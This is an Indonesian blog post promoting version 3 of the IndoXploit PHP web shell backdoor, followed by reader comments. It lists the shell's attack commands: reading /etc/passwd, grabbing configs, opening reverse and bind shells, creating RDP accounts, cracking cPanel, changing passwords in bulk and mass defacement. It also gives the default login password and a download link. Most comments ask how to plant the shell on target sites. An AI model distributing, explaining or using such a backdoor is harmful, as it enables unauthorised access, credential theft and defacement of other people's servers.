Saturday, 10 June 2017

IndoXploit Shell First Edition [ V.3 ]

Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
https://github.com/agussetyar/idxv3/blob/master/indoxploit.php

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

42 comments:

  1. maaf suhu kok eror yh di wndows XP

    Parse error: parse error in C:\xampp\htdocs\indoxploitv3.php on line 528

    ReplyDelete
  2. untuk pencegahanya bagaimana ?
    #defense

    ReplyDelete
    Replies
    1. tutup segala celah yang mungkin ada di web anda.

      Delete
  3. cara menjadikan aplikasi seperti suhu buat itu gimana ??

    ReplyDelete
  4. tutor nanem shell nya gmn ya stah

    #newbie

    ReplyDelete
  5. Nanem shellnya gimana suhu
    Maap baru belajar

    ReplyDelete
  6. suhu ane masukin default pass kagak bisa??
    sory neubi

    ReplyDelete
  7. Replies
    1. link nya sudah kami perbaharui, silakan cek
      https://github.com/agussetyar/idxv3/blob/master/indoxploit.php

      Delete
  8. Replies
    1. link nya sudah kami perbaharui, silakan cek
      https://github.com/agussetyar/idxv3/blob/master/indoxploit.php

      Delete
  9. link nya sudah kami perbaharui, silakan cek
    https://github.com/agussetyar/idxv3/blob/master/indoxploit.php

    ReplyDelete
    Replies
    1. Min mau nanya, nama templatenya apa yah min.?

      Delete
    2. silakan cek di view-source gan

      Delete
  10. kira kira knaapa Error while downloading file Adminer.

    ReplyDelete
    Replies
    1. kemungkinan fungsinya di blokik untuk download

      Delete
  11. cara download nya gimana ?

    ReplyDelete
    Replies
    1. Visit linknya, ada menu download disana

      Delete
  12. om sorry kalau newbie bgt.
    Kalau nanam shell tapi lewat shell yang udah di tanam bisa ga ya? saya coba kok error 404 trs ya..

    ReplyDelete
  13. oi mending Di pastebin aja biar visa langsung Xcomod

    ReplyDelete
  14. maaf suhu kok ngga ada auto edit user ya?

    ReplyDelete
    Replies
    1. Ada kok, itu mass password change

      Delete
  15. min disini kita bisa membuat smtp ga ? kalo bisa perintahnya pa ?
    maaf min minta pencerahannya

    ReplyDelete
  16. Cara upload nya gmna via phone yahh

    ReplyDelete
  17. cara gunain ny gmna mas di windows?

    ReplyDelete
  18. bang agus....kalau mau ngedit shell nya gimana cara decryptnya?

    mau ubah background yg item jadi gambar apa kek.

    ReplyDelete
  19. link mati wkwk , github mah suka gitu sekarang . .

    ReplyDelete
  20. cara upload backdoor ke target gmn ? klo dri script buatan sendiri kan bisa nah klo target gak ada backdoornya kita upload gmn ?

    ReplyDelete